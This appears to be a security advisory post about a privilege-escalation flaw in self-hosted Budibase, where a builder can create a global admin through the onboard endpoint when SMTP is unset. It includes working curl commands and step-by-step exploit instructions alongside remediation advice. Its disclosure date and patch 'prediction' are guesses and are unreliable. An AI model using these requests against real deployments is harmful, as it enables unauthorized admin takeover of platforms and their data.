Listen to this Post
The vulnerability exists in the `POST /api/global/users/onboard` endpoint, which is incorrectly protected by `workspaceBuilderOrAdmin` middleware instead of adminRoutes. On self-hosted Budibase instances where SMTP is not configured (the default), this endpoint does not fall back to the admin-only invite flow. Instead, it directly calls `bulkCreate` to create users. A builder-level attacker can supply a request body containing `”admin”:{“global”:true}` or "builder":true. The `buildInviteMultipleValidation` Joi schema accepts `userInfo` as an optional object with no constraints, so the malicious `admin` and `builder` fields pass through. The middleware `workspaceBuilderOrAdmin.ts` checks `!workspaceId && env.isWorker()` – true for this endpoint – and only verifies hasBuilderPermissions, not admin rights. The `onboardUsers` controller then generates a 12-character password, creates the user document in CouchDB without stripping elevated roles, and returns the password in the response. The attacker can immediately log in as a global admin, achieving full privilege escalation. No SMTP configuration means no email verification or admin approval is required. The route definition at `packages/worker/src/api/routes/global/users.ts:93-109` places the endpoint under builderOrAdminRoutes, while `invite` and `inviteMultiple` are correctly under adminRoutes. The controller at `packages/worker/src/api/controllers/global/users.ts:601-630` checks `isEmailConfigured()` – if false, it proceeds to create users with attacker-controlled roles. No downstream validation in `bulkCreate` or `buildUser` strips `admin` or `builder` fields.
Platform: Budibase
Version: Self-hosted (default config)
Vulnerability: Privilege escalation
Severity: Critical
date: 2023-11-15 (estimated disclosure)
Prediction: Patch within 14 days (e.g., 2023-11-29)
What Undercode Say:
Check if SMTP is configured (if false, vulnerable)
curl -s -X GET 'http://localhost:10000/api/global/settings' -b cookies.txt | jq '.smtp'
Simulate builder login
curl -c cookies.txt -X POST 'http://localhost:10000/api/global/auth/default/login' -H 'Content-Type: application/json' -d '{"username":"[email protected]","password":"builderpass"}'
Exploit to create admin
curl -X POST 'http://localhost:10000/api/global/users/onboard' -H 'Content-Type: application/json' -b cookies.txt -d '[{"email":"[email protected]","userInfo":{"admin":{"global":true}}}]'
How Exploit:
1. Obtain builder session via login.
- Send POST to `/api/global/users/onboard` with JSON array containing `email` and
userInfo.admin.global=true.
3. Receive generated password in `successful[].password`.
- Login as new global admin using that email and password.
Protection from this CVE:
- Move `/api/global/users/onboard` from `builderOrAdminRoutes` to `adminRoutes` in
users.ts. - Add controller validation: reject if `invite.userInfo.admin` and
!ctx.user.admin?.global. - Configure SMTP (forces admin-only invite flow).
- Upgrade to patched version (commit that fixes route authorization).
Impact:
- Builder → global admin escalation.
- Full platform compromise (all apps, data sources, users, config).
- Generated password exposed in HTTP response.
- Stealthy creation – user appears legitimate.
- Default self-hosted deployments are vulnerable.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

